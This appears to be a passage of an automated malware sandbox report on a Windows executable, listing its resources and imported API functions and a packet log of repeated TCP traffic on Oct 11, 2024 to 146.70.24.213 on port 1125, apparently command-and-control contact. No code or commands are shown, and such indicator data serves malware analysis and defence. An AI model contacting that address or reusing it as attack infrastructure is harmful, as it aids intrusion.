                                                                                                                RT_GROUP_CURSOR0x574f480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                RT_GROUP_CURSOR0x574f5c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                RT_GROUP_CURSOR0x574f700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x574f840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x574f980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x574fac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x574fc00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_ICON0x574fd40x5adata0.7
                                                                                                                RT_VERSION0x5750300x368dataEnglishUnited States0.44954128440366975
                                                                                                                DLLImport
                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                user32.dllCharNextW, LoadStringW
                                                                                                                kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
                                                                                                                kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                                                                                                                user32.dllSetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
                                                                                                                version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringW, CloseHandle
                                                                                                                advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                                                                                                                kernel32.dllSleep
                                                                                                                oleaut32.dllSafeArrayGetElemsize, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                                                                                                                shell32.dllShell_NotifyIconW
                                                                                                                winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                                                                                                                winspool.drvGetDefaultPrinterW
                                                                                                                NameOrdinalAddress
                                                                                                                TMethodImplementationIntercept30x4991b0
                                                                                                                __dbk_fcall_wrapper20x417300
                                                                                                                dbkFCallWrapperAddr10x8a1f58
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Oct 11, 2024 16:53:05.863054991 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:05.868313074 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:05.868416071 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:05.869153976 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:05.874092102 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:06.696666956 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:06.697221041 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:06.697329044 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:08.704670906 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:08.709882021 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:08.709980965 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:08.715009928 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:08.867379904 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:08.914247036 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:08.942254066 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:08.954762936 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:08.959743977 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:08.959845066 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:08.964899063 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.070842981 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.117343903 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.204994917 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.205296040 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.210371971 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.210431099 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.215917110 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.216562033 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.221422911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.221487999 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.226387024 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.336935043 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.342206001 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.342300892 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.347101927 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.462908983 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463041067 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463102102 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463099957 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.463113070 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463129044 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463186026 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.463207006 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463217020 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463227034 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463253975 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.463277102 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.463897943 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463933945 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.463979006 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.464067936 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.464138985 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.464148998 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.464186907 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.464549065 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.464565992 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.464605093 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.465210915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.465254068 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.467910051 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.508002996 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.554255962 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554291964 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554302931 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554307938 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554313898 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554325104 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554392099 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.554392099 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.554445028 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554461956 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554478884 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554488897 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554498911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554502010 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.554511070 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.554526091 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.554554939 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.555361986 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.555372000 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.555394888 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.555403948 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.555416107 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.555421114 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.555428028 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.555444956 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.555465937 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.556289911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.556338072 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.556379080 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.556468964 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.556478977 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.556488037 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.556519032 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.556855917 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.556866884 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.556876898 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:09.556895018 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:09.556916952 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.036329985 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.036353111 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.036366940 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.036428928 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.036453962 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.036470890 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.036504030 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.036612034 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.036628008 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.036653042 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.037336111 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.037378073 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.037480116 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.037820101 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.037859917 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.037959099 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038034916 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038074970 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038177967 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038388968 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038429976 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038557053 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038573980 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038589001 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038604975 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038618088 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038623095 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038636923 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038642883 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038654089 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038670063 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038683891 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038708925 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038718939 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038743973 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038758039 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038774967 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038780928 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038790941 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038806915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038814068 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038834095 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038846016 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038861036 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038876057 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038891077 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038899899 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038906097 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038923025 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038928986 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038939953 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038957119 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038971901 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038975000 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.038988113 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.038995028 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.039009094 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.039025068 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.039026976 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.039041996 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.039057970 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.039061069 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.039073944 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.039093971 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.039094925 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.039112091 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.039134026 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.039145947 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.039160967 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.039199114 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.039314032 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.054157972 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.059333086 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.059389114 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.064634085 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.113859892 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.118882895 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.118942022 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.123838902 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.229475021 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.234591961 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.234663963 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.240278006 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.353984118 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.398632050 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.485006094 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.539345980 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.619031906 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.624097109 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.624171019 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.630956888 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.742654085 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.789323092 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.832987070 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:10.882966995 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:10.945647001 CEST497301125192.168.2.4146.70.24.213
